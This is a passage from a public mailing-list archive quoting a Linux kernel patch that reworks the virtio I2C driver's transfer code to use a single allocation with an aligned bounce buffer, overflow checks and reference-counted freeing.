> > > -                                 struct i2c_msg *msgs, int num)
> > > +static int virtio_i2c_complete_xfer(struct virtio_i2c_xfer *xfer,
> > > +                                 struct i2c_msg *msgs,
> > > +                                 int num)
> > >  {
> > > +     struct virtio_i2c_req *reqs = xfer->reqs;
> > > +     u8 *bounce_buf = xfer->bounce_buf_base;
> > >       bool failed = false;
> > >       int i, j = 0;
> > >
> > >       for (i = 0; i < num; i++) {
> > >               struct virtio_i2c_req *req = &reqs[i];
> > > +             struct i2c_msg *msg = &msgs[i];
> > > +
> > > +             if (wait_for_completion_interruptible(&req->completion))
> > > +                     return -EINTR;
> > > +
> > > +             if (req->in_hdr.status != VIRTIO_I2C_MSG_OK) {
> > > +                     /*
> > > +                      * Don't break yet. Try to wait until all requests
> > > +                      * complete to ensure that the virtqueue has enough
> > > +                      * descriptor slots for the next transfer.
> > > +                      */
> > > +                     failed = true;
> > > +             }
> > >
> > >               if (!failed) {
> > > -                     if (wait_for_completion_interruptible(&req->completion))
> > > -                             failed = true;
> > > -                     else if (req->in_hdr.status != VIRTIO_I2C_MSG_OK)
> > > -                             failed = true;
> > > -                     else
> > > -                             j++;
> > > +                     if (req->read)
> > > +                             memcpy(msg->buf, bounce_buf, msg->len);
> > > +                     j++;
> > >               }
> > >
> > > -             i2c_put_dma_safe_msg_buf(reqs[i].buf, &msgs[i], !failed);
> > > +             bounce_buf += virtio_i2c_bounce_size(msg->len);
> > >       }
> > >
> > >       return j;
> > > @@ -136,14 +200,31 @@ static int virtio_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs,
> > >  {
> > >       struct virtio_i2c *vi = i2c_get_adapdata(adap);
> > >       struct virtqueue *vq = vi->vq;
> > > -     struct virtio_i2c_req *reqs;
> > > -     int count;
> > > +     struct virtio_i2c_xfer *xfer;
> > > +     size_t alloc_size;
> > > +     int i, count;
> > > +
> > > +     alloc_size = struct_size(xfer, reqs, num);
> > > +     if (check_add_overflow(alloc_size,
> > > +                            dma_get_cache_alignment() - 1,
> > > +                            &alloc_size)) /* padding for PTR_ALIGN() */
> > > +             return -EOVERFLOW;
> > > +     for (i = 0; i < num; i++) {
> > > +             if (check_add_overflow(alloc_size,
> > > +                                    virtio_i2c_bounce_size(msgs[i].len),
> > > +                                    &alloc_size))
> > > +                     return -EOVERFLOW;
> > > +     }
> > >
> > > -     reqs = kzalloc_objs(*reqs, num);
> > > -     if (!reqs)
> > > +     xfer = kzalloc(alloc_size, GFP_KERNEL);
> > > +     if (!xfer)
> > >               return -ENOMEM;
> > >
> > > -     count = virtio_i2c_prepare_reqs(vq, reqs, msgs, num);
> > > +     kref_init(&xfer->ref);
> > > +     xfer->bounce_buf_base = PTR_ALIGN((u8 *)(xfer->reqs + num),
> > > +                                       dma_get_cache_alignment());
> > > +
> > > +     count = virtio_i2c_prepare_xfer(vq, xfer, msgs, num);
> > >       if (!count)
> > >               goto err_free;
> > >
> > > @@ -157,10 +238,10 @@ static int virtio_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs,
> > >        */
> > >       virtqueue_kick(vq);
> > >
> > > -     count = virtio_i2c_complete_reqs(vq, reqs, msgs, count);
> > > +     count = virtio_i2c_complete_xfer(xfer, msgs, count);
> > >
> > >  err_free:
> > > -     kfree(reqs);
> > > +     kref_put(&xfer->ref, virtio_i2c_xfer_release);
> > >       return count;
> > >  }
> > >
> > > --
> > > 2.54.0
> >

^ permalink raw reply


This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox